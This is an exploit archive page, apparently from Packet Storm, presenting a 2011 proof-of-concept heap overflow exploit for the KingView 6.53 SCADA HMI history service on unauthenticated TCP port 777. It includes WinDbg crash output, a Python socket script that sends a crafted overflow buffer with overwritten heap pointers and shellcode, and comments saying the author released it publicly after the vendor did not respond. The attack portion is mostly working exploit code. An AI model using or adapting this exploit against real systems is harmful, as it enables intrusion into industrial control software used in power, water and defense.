what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

KingView 6.53 SCADA HMI Heap Overflow

KingView 6.53 SCADA HMI Heap Overflow
Posted Jan 10, 2011
Authored by Dillon Beresford

KingView version 6.53 SCADA HMI heap overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
SHA-256 | 756238865e761c8e5c2055ba2ba802745cf3ac23518d9635de69403c333d7b1a

KingView 6.53 SCADA HMI Heap Overflow

Change Mirror Download
## Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC
## Date: 9/28/2010
## Author: Dillon Beresford
## Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
## Version: 6.53 (English)
## Tested on: Windows XP SP1 ( works on SP2 and SP3 ) will release new targets after CERT advisory is public.

## Shouts to HD Moore JDuck, Egyp7, todb, |)ruid, nate and the rest of the AHA! crew.
## Thanks to all who share knowledge about heap smashing and heap bypass techniques.

## Notified CERT and the vendor, CERT notified the vendor as well, vendor never responded.
## No patch or response from vendor as of 1/9/2011
## Lets get this into the wild and see how long it takes them to respond.

## Looks like persistence pays off. :-)

## SP2/SP3 targets will be available soon. (putting into metasploit this is just a poc to get response from vendor).
## Vendor: Beijing WellinControl Technology Development Co.,Ltd
## http://www.wellintek.com

## Beijing WellinControl Technology Development and CHINA CERT were notified on Tue, Sep 28, 2010 at 6:31 AM
## I have made every attempt and yet they choose to ignore...
## This PoC should wake up the dragon. >:-]
## With more to come!

## KingView software is a high-pormance production which can be used to building a data information
## service platform in automatic field. KingView software can provid graphic visualization which takes
## your operations management, control and optimization . KingView is widely used in power,
## water conservancy,buildings, coalmine, environmental protection, metallurgy and so on.
## And now KingView software is used in national defense, Aero-Space in China.

## Notes: The HistorySrv process listens on TCP port 777
## This process does not require any authentication from clients

## An attacker could replace the Flink and Blink pointers with evil ones.. Herrow srweeping dragon.

## Windows XP SP1 (x86)
## CommandLine: "C:\Program Files\Kingview\HistorySvr.exe"
## eax=00241eb4 ebx=7ffdf000 ecx=00000003 edx=77f6eb08 esi=00241eb4 edi=00241f48
## eip=77f767cd esp=0012fb38 ebp=0012fc2c iopl=0 nv up ei pl nz na po nc
## cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
## ntdll!DbgBreakPoint:
## 77f767cd cc int 3
## 0:000> g
## ModLoad: 71950000 71a34000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll
## ModLoad: 5ad70000 5ada4000 C:\WINDOWS\System32\uxtheme.dll
## ModLoad: 71a50000 71a8b000 C:\WINDOWS\system32\mswsock.dll
## ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll
## (318.6d4): Access violation - code c0000005 (first chance)
## First chance exceptions are reported before any exception handling.
## This exception may be expected and handled.
## eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000
## eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0 nv up ei pl zr na pe nc
## cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901 mov dword ptr [ecx],eax ds:0023:44444444=????????
## 0:000> u
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901 mov dword ptr [ecx],eax
## 77f62571 894804 mov dword ptr [eax+4],ecx
## 77f62574 3bc1 cmp eax,ecx
## 77f62576 7534 jne ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62578 668b06 mov ax,word ptr [esi]
## 77f6257b 663d8000 cmp ax,80h
## 77f6257f 732b jae ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62581 0fb7c8 movzx ecx,ax


## usage python exploit.py 127.0.0.1 777

import os
import socket
import sys

host = sys.argv[1]
port = int(sys.argv[2])

print " KingView 6.53 SCADA HMI Heap Smashing Exploit "
print " Credits: D1N | twitter.com/D1N "

shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\x44\x80\xc2\x77"
"\xFF\xD1\x90\x90")

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14") # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += shellcode

print " [+] Herrow Sweeping Dragon..."
print " [+] Sending payload..."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)
data = s.recv(1024)

print " [+] Closing connection.."
s.close()
print " [+] Done!"


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close